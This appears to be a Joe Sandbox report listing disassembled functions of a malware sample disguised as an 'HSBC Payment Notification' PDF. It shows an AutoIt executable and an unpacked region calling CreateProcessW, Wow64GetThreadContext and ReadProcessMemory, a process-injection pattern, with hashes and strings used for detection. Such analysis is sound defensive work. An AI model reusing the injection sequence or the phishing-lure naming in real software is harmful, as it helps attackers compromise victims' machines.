Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88

Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004037AE
/AutoIt3ExecuteScript, xrefs: 004038BC
RL, xrefs: 0043D213
CMDLINERAW, xrefs: 004037FB
CMDLINE, xrefs: 00403822
/AutoIt3OutputDebug, xrefs: 00403892
/AutoIt3ExecuteLine, xrefs: 004038A7
/ErrorStdOut, xrefs: 0040387D

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
API String ID: 1825951767-3937808951
Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

Function 009B7960 Relevance: 15.3, APIs: 10, Instructions: 337COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00995A6E), ref: 009B7925

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: DirectoryWindows
String ID:
API String ID: 3619848164-0
Opcode ID: d2ecbca0c478f7f5e2cc2a4311e90cce0743dc9a256b77d9058795b0d375bfe1
Instruction ID: aef9ca73fbbad12392e23d770a7c0233f60ac82376a3c84da7ca9ec7c5b40bce
Opcode Fuzzy Hash: d2ecbca0c478f7f5e2cc2a4311e90cce0743dc9a256b77d9058795b0d375bfe1
Instruction Fuzzy Hash: 30A1E02094D3855EDB3657E48F09BF5FF6C5FE2770F590BCAE1819A1E2E2284D08D262

Function 0099FA40 Relevance: 13.2, APIs: 8, Instructions: 1187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e23cf31dd4484d054f0e26c937258c7020bc1d792ea343de25ce12324caf592
Instruction ID: 46ec8c1a2c05080d7c33212401813f234c56e9c9cfa03a246b5e06914ac4b850
Opcode Fuzzy Hash: 6e23cf31dd4484d054f0e26c937258c7020bc1d792ea343de25ce12324caf592
Instruction Fuzzy Hash: 1592B77190D3809FDF25CF2CC86476AFBE8ABA6314F0949AEE485C7292E2759C44C753

Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
OleInitialize.OLE32(00000000), ref: 0040FA4A
CloseHandle.KERNEL32(00000000), ref: 004445C8

Strings

\TL, xrefs: 0040F7F7
SL, xrefs: 0040F7EB
%I, xrefs: 0040F796, 0040F7A8, 0040F96E, 0040FA51
<WL, xrefs: 0040F930

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WL$\TL$%I$SL
API String ID: 1986988660-4199584472
Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

Function 00C41598 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C41669
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C4188F

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: 3fd29e520da4d881ae63ac00fc75eefb8706a547e720e7d6d2913cbf6ac15b9b
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: 26A13674E00208EBDB14CFA5C898BEEBBB5FF48704F248159E951BB280D7759A80DF54

Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
ShowWindow.USER32(00000000,?,?), ref: 00403A38
ShowWindow.USER32(00000000,?,?), ref: 00403A41

Strings

edit, xrefs: 00403A1E
AutoIt v3, xrefs: 004039FB, 00403A00, 00403A01

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

Function 00C41328 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C41218: Sleep.KERNEL32(000001F4), ref: 00C41229

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C4148A

Strings

YVB44W6WO799IO4YYA2G89YG9ER6RA, xrefs: 00C414F0, 00C414F3

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CreateFileSleep
String ID: YVB44W6WO799IO4YYA2G89YG9ER6RA
API String ID: 2694422964-1745190442
Opcode ID: 16138226557ed54f16b30bc9730826e8934e2176487cc0c2b10d7763f98a2caf
Instruction ID: 5a7cb7d6c156d00af33d82578864ec7ff0fdc10984b2aead748c3a1c27f89246
Opcode Fuzzy Hash: 16138226557ed54f16b30bc9730826e8934e2176487cc0c2b10d7763f98a2caf
Instruction Fuzzy Hash: 71616230D04288DBEF11DBE4D848BEEBB75AF15304F044199E659BB2C1D7BA0B45CB66

Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_memset.LIBCMT ref: 004040FC
_wcscpy.LIBCMT ref: 00404150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

Strings

Line: , xrefs: 0043D400

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F

Function 00C40218 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00C40A45
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C40A69
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C40A8B

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9047a88c2d072b7342029fe0aa6aa2f7d3ded7dcef0efedc075a7d8f177d985c
Instruction ID: 5f500e533805624b505a4853c7c0ebb36285564a2d6a4f088c2225116ec37070
Opcode Fuzzy Hash: 9047a88c2d072b7342029fe0aa6aa2f7d3ded7dcef0efedc075a7d8f177d985c
Instruction Fuzzy Hash: 80620B30A54258DBEB24CFA4C841BDEB372FF58300F2091A9D21DEB291E7759E85CB59

Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042547B
_memcpy_s.LIBCMT ref: 004254ED
__read_nolock.LIBCMT ref: 0042554B
__filbuf.LIBCMT ref: 0042556E
_memset.LIBCMT ref: 004255B2

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49

Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

_free.LIBCMT ref: 0043E263
_free.LIBCMT ref: 0043E2AA

Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0043E039
Bad directive syntax error, xrefs: 0043E292

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 25f7fc4f1835b3533dd58efb0dfe797f6598f87ef585f97ea147526d1d8effbf
Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
Opcode Fuzzy Hash: 25f7fc4f1835b3533dd58efb0dfe797f6598f87ef585f97ea147526d1d8effbf
Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59

Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617

Strings

Control Panel\Mouse, xrefs: 004035D2

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768

Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

_free.LIBCMT ref: 004696A2
_free.LIBCMT ref: 004696A9
_free.LIBCMT ref: 00469714

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 0046971C

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59

Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004247A0
__flush.LIBCMT ref: 004247C0
__write.LIBCMT ref: 004247F3
__flsbuf.LIBCMT ref: 00424821

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48

Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004044CF

Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

KillTimer.USER32(?,00000001,?,?), ref: 00404524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49

Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00404CBA

Strings

EA06, xrefs: 0043D8CC
AU3!P/I, xrefs: 00404CB4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/I$EA06
